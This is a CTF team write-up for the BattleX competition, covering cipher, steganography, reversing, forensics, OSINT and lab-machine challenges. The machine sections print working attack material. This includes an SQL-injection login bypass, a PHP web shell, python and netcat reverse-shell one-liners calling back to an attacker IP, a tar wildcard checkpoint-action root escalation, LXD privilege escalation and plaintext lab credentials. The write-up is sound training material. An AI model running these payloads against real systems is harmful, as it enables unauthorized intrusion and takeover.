# Team Name: Dont.Test.Us
# Team Members
- Tahaa Farooq - [@tahaafarooq](https://x.com/tahaafarooq)
- Erick Alex - [@AlienKeric](https://x.com/AlienKeric)
- Mercy John - [@daemon](https://x.com/meccAlly)
- Paul Kapufi - [@KapufiPaul](https://x.com/KapufiPaul)
- Nicholaus Nyarwango - [@nicl4ssic](https://x.com/nicl4ssic)
## Final Scoreboard
## Challenge Tasks
### Task 1: Welcome to BattleX CTF
Challenge Description said that *"find your first flag https://x.com/battleX_ctf"*
Visiting to the given link we were able to find the flag
Flag: `battleX{5d41402abc4b2a76b9719d911017c592}`
### Task 2: crackme
```
='%+H9h/)PAOguI;b0W/=)1]K:/s#,;-7d59l!cc<,QYYA2#`<>'`e:<_#l.=''?-AQ:`Z;f+6a@TI8g<*4*@@RW,"9ggZu
```
We pasted the encoded string in Cyberchef and by using 'Magic' recipe it revealed the flag
Flag: `battleX{7d793037a0760186574b0282f2f435e7}`
```
*>u_5vI=(wDH~%9>}>y;+s"a|;u<|K4K*au<+%#=~s|J};xb*;#>}?_l
flag:battleX{098f6bcd4621d373cade4e832627b4f6}
```
Were given a cipher text, so far this was a rot47, by using cyberchef we can get a flag
```
籥籴簿簻籥籴簿簺籥籴籀簽籥籴籀簽籥籴簿籙籥籴簿簾籥籴簾籁籥籴籀籘籥籴簼簾籥籴簿簾籥籴簿簻籥籴簿簾籥籴簼簻籥籴簼簻籥籴簼籂籥籴簼簽籥籴簿簾籥籴簿簼籥籴簿簽籥籴簼簹籥籴簿簾籥籴簼簹籥籴簿簿籥籴簼簹籥籴簼籁籥籴簿簾籥籴簿簺籥籴簿簻籥籴簼籀籥籴簼簿籥籴簼籂籥籴簼簹籥籴簿簽籥籴簼簻籥籴簿簺籥籴簼簿籥籴簿簾籥籴簿簾籥籴簼簿籥籴簼籂籥籴籀籚
flag:battleX{5ebe2294ecd0e0f08eab7690d2a6ee69}
```
With this challenge we were given something like a chinese message but infact it was not a chinesse it was a rot8000 then then encoded with hexdecimal which we can use even chart-gpt to solve this.
from here i knew this was something like hexdecimal so i used chart-gpt so solve from here
```
yzggovC{v99z18x428xy38w5u260853678922v03}
flag: battleX{e99a18c428cb38d5f260853678922e03}
```
This was a affine cipher text with online tools u can easly get the flag,simple like that
```
cammwiU{e8578ewy8458ni06ccc5uu76l58g5zb4}
```
We pasted the encoded string to Cyberchef and tried the 'Magic' recipe but there was no any lucky. Back to the challenge hint it said 'the key is battlex'. So we used "Vigenere Decode" recipe with the given key and we got the flag
Flag: `battleX{d8578edf8458ce06fbc5bb76a58c5ca4}`
### Task 3: cat
We have been provided with an image and we are using `file` command to determine the file type
It's a JPEG image file, we tried to open it but nothing interesting. Then we decided to use `stegseek` to extract embedded files if there is any
And yes, we found embedded file that was extracted to `cat-1718892409091.jpg.out`. By using `cat` we get a base64 encoded string
Trying to decode the string using `base64` we got a clear flag though it seems that its a zip file. We saved the file then unzipped it and we got the flag
Flag: `battleX{5f4dcc3b5aa765d61d8327deb882cf99}`
### Task 4: reverse1
We have been provided with a file and we are using `file` command to determine the file type
It's a linux binary (ELF), we used `rabin2` to check if there is any clear text from the binary and yes we got the flag
Flag: `battleX{c1d9f50f86825a1a2302ec2449c17196}`
### Task 5: reverse2
We have been provided with a file and we are using `file` command to determine the file type
It's a linux binary (ELF), we used `rabin2` to check if there is any clear text from the binary
When executing the binary it takes input from a user, if a user provide a correct required reversed value will get a flag, but if it's incorrect will get a message "Input does not match the required reversed value"
In order to get the flag, the binary takes the string `3TWQfd2245njBEWrTX` but it should be reversed. Let's reverse it and get the flag
Flag: `battleX{6c569aabbf7775ef8fc570e228c16b98}`
### Task 6: reverse3
There are simply 2 ways to solve this and get the flag, the first way is the intended way, and the second way is by debugging the binary.
#### Intended Way
First thing first, I need to fetch the strings which are readable;
I got a bunch of MD5 strings, I will save them aside, they look useful to us!
I then upload my binary to binary ninja for further analysis, but before we begin, let's try running our binary and see it's behavior and how it functions:
Okay running the binary we see that it takes the input, and then reverses the input string and displays the output but also fails and asks for another input! Let's head back to analysis!
As seen above, that's the main function , breaking it down we can see that it asks for an input and then a function known as `reverse_string` is called which I guess in this case it's the function that reverses our string as seen earlier and next a comparison is done to check if the string matches and if it matches the string it's being compared with and that's any one of the hashes respectively then it'll give the flag back!
Now that We have understood how this actually works! We don't need to review the `reverse_string` function because we have already seen the output. Our way forward right now is to reverse the first hash string and input it since it'll be reverse back to it's original form and the comparison will be True it'll give us the flag:
Alright but it doesn't end here, the flag format is `BattleX{*}`, in this case our flag isn't yet found, I went ahead to review the `decode_function` which decodes the flag and assigns it to `var_318` before we are asked for an input:
I understand that it was first XOR'ed for us to be able to get the so called "flag" I tried performing an XOR bruteforce again to see if I can get the flag:
And there we go, we got the flag!
#### Debugging The Binary
Yea! I know this is un-necessary, but hell-yeah! Let's Do IT Anyways! So basically we realized that the variable `var_318` is being assigned with the value of the flag from the `decode_flag` function which is called at the main function before we are prompted for input, In this case if we are able to set a breakpoint at the `decode_flag` return instruction then we will get the flag, i'll be using radare2 for this one!
First we need to open our binary in radare2:
Then we shall locate the address of `sym.decode_flag` function and there we have it, next up let's read the disassembled output of the main function and the `sym.decode_flag` function, so that we can know the address of the `ret` instruction and set a breakpoint at it! but also so that we can understand in which register the output will be saved to:
From the main function we can see that it's saved to `rdi` register, now let's open up the `sym.decode_flag` and set a breakpoint at the `ret` instruction:
We then set a breakpoint:
then we run our binary, and wait till it hits the breakpoint:
Now let's review the registers and look for `RDI`:
let's fetch the data inside the `RDI` register:
# Task 7: machine1
## SCANNING
```
# Nmap 7.94SVN scan initiated Sat Jun 29 04:07:42 2024 as: nmap -vvv -p 22,80 -sC -sV -oN nmap.txt 10.10.3.69
Nmap scan report for 10.10.3.69
Host is up, received echo-reply ttl 63 (0.50s latency).
Scanned at 2024-06-29 04:07:43 EDT for 23s
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 f8:89:12:c0:ab:91:e2:29:1f:55:a6:b1:aa:48:e5:37 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDPxr21+eAHFrWP67taxly11JJI0DMgJjdhNeWpFCiN6CRTb9Rxz7p1RDMIXYqzN5C+Hy7nCbHkQ3nAwAHfPhzqawAIa4Mg/TfORplUUA7Od6mFgz5RUj33qXMS1uqMr4pWhQcT37RgpV6Vo++Yz9qBQ83HxWdP6A08orcL1t+FyoZxAn/qaQkeQQk+WChJQTIGxuicxMGIA0WthbL+OJU+vMqA6Gm11Z6aYAqV2AfVpj2cQukZPZ5FG0PdgJ1KgTPdkxv3KM15pFlIjhslIwusLT6gKwpU/tXdUXtGaXyBoU6vNeCdHYF2cBtOUhSJ62L1MVYrj+sLnBoDYCMcrgIF
| 256 46:05:a8:f4:66:29:41:79:01:a0:43:b8:a9:ef:47:5d (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIdkg7iA2BElaTpbaWePGpDAUeXPr6/XchFO9Y9mtHZhUuGbwbJMphJmnS8fyEbSWXHfvf4EaA11N+NTjhhadxE=
| 256 04:db:fa:b1:16:82:c5:99:86:41:ba:8a:ea:72:34:08 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIMcf9Dp5hGXAJYfBrk+rXvQ47Rtjoe+UuTQQ/fnB4X7Y
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Proverb Categories
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jun 29 04:08:06 2024 -- 1 IP address (1 host up) scanned in 24.69 seconds
```
## ENUMERATION
```
### enuemerating port 80
With trying to enumerate port 80
http://10.10.3.69/45c48cce2e2d7fbdea1afc51c7c6ad26.html
```
upon enumerating the system we can see that if we click any of the categories we get something like md5, so we can use online tools to reverse the md5 and you will notice that the md5 is a simple number.
So if we can change it to '0' we get some juice info. such as ssh keys you can crack it with john or hashcat and then login.
if you login u get the user flag.
## EXPLOITATION
```
## creds
username:jayhunts
password: chicken
```
And from here we can glab the user flag in the user home directory.
## PRIVILEGE ESCALATION
privilege escalation was simple, once i saw the lxc is present i knew how to exploit this coz we just needed only to add the our own image and assign it privilege and moun to root directory simple as that.
```
reference:
1. https://steflan-security.com/linux-privilege-escalation-exploiting-the-lxc-lxd-groups/
```
As the article above says now we need to start the lxc image and execute it.The flag is in the /mnt/root/root/root.txt.
# Task 8: machine2
## SCANNING
```
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))
| http-methods:
|_ Supported Methods: HEAD GET POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Big Hacking Book Store
```
## ENUMERATION
Scanning reveals only one running port so lets try to enumerate thiso one.
By checking the technologies we have get the idea of trying sql injection via a login page.
```
payload: admin' or 1=1-- -
for both username and password
```
After getting inside we get a ping system but so far the ping system block some of our filters.
## EXPLOITATION
Bypassing this filter and execute command we can use null bytes to bypass this one.
From here we went further more and use burp suite for exploitation mode.
getting a shell we can write a simple php and upload actually here we need to find a location where we can upload our stuffs and i.e images.
Now we have already upload our file now lets got for command execution.
```
username = "hacksparo";
password = "hacksparoisthebest123";
$dbname = "books";
```
use the creds to login as hacksparo and glab the user flag in the home directory.
## PRIVILEGE ESCALATION
with 'sudo -l' give us some juice info to get a root access.
```
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1| nc 10.21.19.120 4444 >/tmp/f" > shell.sh
echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "" > --checkpoint=1
```
now if we run the sudo command it will execute our payload and we get root access.
# Task 9: machine 3
## SCANNING
```
# Nmap 7.94SVN scan initiated Sat Jun 29 04:59:12 2024 as: nmap -sC -sV -oN machine3.txt -T4 -vvv 10.10.137.169
Nmap scan report for 10.10.137.169
Host is up, received echo-reply ttl 63 (1.4s latency).
Scanned at 2024-06-29 04:59:13 EDT for 29s
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 63 vsftpd 3.0.3
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.21.19.120
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxrwxrwx 2 0 0 4096 Jun 23 15:38 images [NSE: writeable]
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Hacksparo Blogs - Cybersecurity & Pentesting
Service Info: OS: Unix
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jun 29 04:59:42 2024 -- 1 IP address (1 host up) scanned in 29.62 seconds
```
## ENUMERATION
From the nmap scanning we have seen two open port that is port 21 and port 80, with port 21 allows anonymous login and also allows us to upload something via our machine so we can abuse this one.
```
payload:<?php system($_GET["batman"]);?>
```
Now inorder to find where this images are being locate in the web page lets find any page and try to view it another tab it will show us where exactly our images are being uploaded via ftp server.
## EXPLOITATION
The location where our image is being uploaded is 'http://10.10.195.185/userdata45545/image1.jpg'
```
payload:
python3+-c+'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.21.19.120",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
```
As you can see user with shell are two i.e commanderx and ftpuser. But the password that was being used here was also the root password so we can login as root.
```
##root creds
username: root
password:91297623
```
## PRIVILEGE ESCALATION
both user flag and root flag are on the same directory.
# Task 10: forensics
We have been provided with a file and we are using `file` command to determine the file type
It's a pcapng capture file. Let's use wireshark to analyze the file
Checking the protocol hierarchy we see a lot of protocols but what we are interested with are ftp and http, we start with ftp and follow tcp streams
We determined that a user logged in to the ftp server using the credentials `azera:hacktheplanet123` and he did nothing then he logged out. Now let's analyze the http protocol and see what happened
Filtering the http protocol shows that a user tried to upload a file, we follow http streams to analyze the upload process
A user successful uploaded a file named "tazine"
We see that the file was encoded in base64, we upload the encoded string to cyberchef and we get our flag
Flag: `battlex{e99a18c428cb38d5f260853678922e03}`
# Task 11: Find me babe
We have been provided with a file and we are using `file` command to determine the file type
It's a Squashfs filesystem. What is it? According to Wikipedia
```
Squashfs is a compressed read-only file system for Linux. Squashfs compresses files, inodes
and directories, and supports block sizes from 4 KiB up to 1 MiB for greater compression.
Several compression algorithms are supported. Squashfs is also the name of free software,
licensed under the GPL, for accessing Squashfs filesystems.
Squashfs is intended for general read-only file-system use and in constrained block-device
memory systems (e.g. embedded systems) where low overhead is needed.
```
Searching in Google how to analyze the Squashfs file we found this link [here](https://lifs.hallym.ac.kr/blog/2019/08/19/File-System-Analysis-of-LG-Forensic-Image-with-Binwalk.html) on how to analyze squashfs file. We will use `binwalk` tool to extract the squashfs filesystem
We extracted the squashfs file system into our attack machine, and listing the directories we got the linux filesystems
Since our aim is to find the flag we will use `find` and `grep` command to achieve this
Alternative 2: We can use `rg` command for recursively search the directory for lines matching a pattern "battlex"
Flag: `battlex{1bc29b36f623ba82aaf6724fd3b16718}`
# Task 12: hackland
This one was one among another easy challenge, we were just given a large file with many directories, so we were needed to extract this and extract the flag.
by using the power of batman and grep we can get a flag easy like that.
```
command: grep -iR battlex{}
flag.txt:battlex{8c9fc2c0a153a244a45635fb8f4d71f1}
```
# Task 13: another_machine
## SCANNING
```
# Nmap 7.94SVN scan initiated Sat Jun 29 14:11:13 2024 as: nmap -vvv -p 22,80 -sC -sV -oN machin4.txt 10.10.160.167
Nmap scan report for 10.10.160.167
Host is up, received echo-reply ttl 63 (1.7s latency).
Scanned at 2024-06-29 14:11:16 EDT for 24s
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 f8:89:12:c0:ab:91:e2:29:1f:55:a6:b1:aa:48:e5:37 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDPxr21+eAHFrWP67taxly11JJI0DMgJjdhNeWpFCiN6CRTb9Rxz7p1RDMIXYqzN5C+Hy7nCbHkQ3nAwAHfPhzqawAIa4Mg/TfORplUUA7Od6mFgz5RUj33qXMS1uqMr4pWhQcT37RgpV6Vo++Yz9qBQ83HxWdP6A08orcL1t+FyoZxAn/qaQkeQQk+WChJQTIGxuicxMGIA0WthbL+OJU+vMqA6Gm11Z6aYAqV2AfVpj2cQukZPZ5FG0PdgJ1KgTPdkxv3KM15pFlIjhslIwusLT6gKwpU/tXdUXtGaXyBoU6vNeCdHYF2cBtOUhSJ62L1MVYrj+sLnBoDYCMcrgIF
| 256 46:05:a8:f4:66:29:41:79:01:a0:43:b8:a9:ef:47:5d (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIdkg7iA2BElaTpbaWePGpDAUeXPr6/XchFO9Y9mtHZhUuGbwbJMphJmnS8fyEbSWXHfvf4EaA11N+NTjhhadxE=
| 256 04:db:fa:b1:16:82:c5:99:86:41:ba:8a:ea:72:34:08 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIMcf9Dp5hGXAJYfBrk+rXvQ47Rtjoe+UuTQQ/fnB4X7Y
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
|_http-title: Death Note - Add Names
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jun 29 14:11:40 2024 -- 1 IP address (1 host up) scanned in 26.64 seconds
```
## ENUMERATION
With scanning reveals some two open port but since we have no creds lets we decided to deal with port 80 and where u will find something interested.
### port 80
trying to bypass with some simple extensions we can see that we get some erros.
This error was very interesting for me, since because from here i can do this in many ways to bypass this one so lets go with easy newbies way, lets not complicate stuffs.
What this filter in the upload section tries to do is that it only check the file header and it check on the first four bytes(this sucks for sure).
### FOOTHOLDING
I uploaded a valid image so as i can see where this file is being uploaded and see it it leaks some uploads section.
If we browser to `note` we find a location were images are being uploaded mhmmm this is nice.
After some simple edit on the php and using hexeditor i came with my simple payload here.
## EXPLOITATION
since we know the location of our payload being lets execute some simple command on the target and then lets get some shell using some built in extensions.
### getting a shell as www-data
So far we can see that we have three users `root,light,ryuk`
### shell as ryuk
In the `/opt` there is a `id_rsa` key we can use that one to move to another user.
user flag is own by root and light mhmm nice, but we have some rotecreds so lets use that one to get `light` access.
### shell as light
## PRIVILEGE ESCALATION
after running some find command to such for SUID binaries we get some of interested binaries to exploit here.
with user `ryuk` we can exploit via a docker-engine `lxc` just exit on user `light` and use the same approach as we did on the first machine.
And now we can get a root flag which we have just mount in the `/mnt/root/root.txt`
# Task 14: machine :)
## SCANNING
Port scanning reveal that there are 3 ports running on the target
## ENUMERATION
### Port 21 (FTP)
From the port scan results we see that port 21 is running `vsftpd 3.0.3` and "Anonymous login" is allowed, so let's login
We found two files from the FTP Server and downloaded them into our machine. We read the files and find this information
The message in 'note' file it's from Security department (Hacksparo) reminding `Mrs S` to change her password. We saved the username found (Mrs S & Hacksparo) they may be helpful later.
I also Google searched and found no current exploits for vsFTPd 3.0.3. We can next take a look at HTTP on port 80 since there is also no current exploit for the version of SSH running on port 22
### Port 80 (HTTP)
We visited port 80 on browser there is nothing interesting, but from port scanning results we observed that there is a robots.txt on the site. Let's view it
Visiting the page page we can see that it is displaying a .txt file stored in /var/www/html
It seems that there is a Local File Inclusion vulnerability, let's try to read /etc/passwd file from the server
We were able to read /etc/passwd file from the server and we found 3 users (root, alex and sophia).
## EXPLOITATION
Remember from the note file from FTP server, there was a message to Mrs S to change her password since it's crackable. From the /etc/passwd file there is a user called sophia. So we can guess that user is Mrs S and since her password was able to be cracked we can use `hydra` to crack her password.
We found her SSH login credentials `sophia:babygurl` now let's try to login
We were able to login as sophia but we can't find the user flag
### Shell as alex
Navigating to the home directory of user alex we found the user.txt file but we can't read it as sophia since it is owned by alex. Listing all files in the directory we discovered the directory named `...` let's navigate in it
Navigating to the directory we found the file my_pass, we read it and we got user alex credentials, we login as alex and we were able to read the user.txt file
User.txt: `e4d909c290d0fb1ca068ffaddf22cbd0`
## PRIVILEGE ESCALATION
Running `sudo -ll` we can see that user alex can use `curl` to access the file system, escalate or maintain privileged access. Let's use it to read root.txt
Root.txt: `5d41402abc4b2a76b9719d911017c592`
# Task 15: TNISO
We have been given an image with *"Can you find the email address of the owner of this artwork? I need to contact him."*
Reading again the task name it seem that it has been reversed, TNISO = OSINT. So, we are supposed to use OSINT skills to find the email of the artwork owner. Navigating to [Google](https://images.google.com) we searched the image and we found many results but the interesting one was the Instagram link
Visiting the link we see it's from the account of a user `@art0fdeath` posted that photo and tagged the user `@clayshaper`
It seems that the owner of the artwork is `@clayshaper` visiting at his account we found a link to a user website
Visiting the link we found links to his different accounts, also we found his email address
Flag: `battlex{clayshaper@outlook.com`
# Task 16: nohint
We have been provided with a file and we are using `file` command to determine the file type
It's a jpeg image format file, but trying to open it seems like it is corrupted. We check the file signature of a file using `hexeditor` tool
The file signature of a file is not correct since the file signature of a jpeg format starts with `FF D8 FF E0` so will have to change it to its correct signature using `hexeditor`
We save the file and open it. It works now we can see the correct image. Using `exiftool` to check for the file metadata nothing seem interesting
Using `steghide` to check if there is and embedded file in the image
Since we don't have a passphrase we can't extract any embedded file so we will use `stegseek` to perform a bruteforce
We were able to extract embedded file, let's read the flag
Flag: `battlex{5f4dcc3b5aa765d61d8327deb882cf99}`
# COMMENTS
## alien-keric
The ctf was really fun and simple by the way, with team work we managed to solve them the time they were being uploaded like `fast-of-furious` that why we managed to win this CTF, it was really nice i liked the moment when the guy uploaded the challenge and we solved it within 2-3 seconds because we were waiting for him to upload `fucking crazy` we are batmans `D0nt T3st Us` we will deal with u.
## Tahaa Farooq
WE ZOMBIE! The CTF was great because we won! 💀 Overall the challenges were great, GGs to [hacksparo](https://x.com/hack_sparo) for the challenges that he authored I enjoyed mostly the machines rather than any other category but yeah **FOR GOTHAM!!!** **AM BATMAAAN**!🧟
## nicl4ssic
Tackling all the challenges in time and securing 1st position was an exhilarating experience! I am incredibly proud of our team's effort and collaboration. This victory not only highlights our technical skills but also our ability to work seamlessly under pressure. Looking forward to more such exciting challenges!. Again **WE ARE NOT TO BE TESTED** pewpew 💣
## daemon
## DON
Sign in with Wallet
Connect another wallet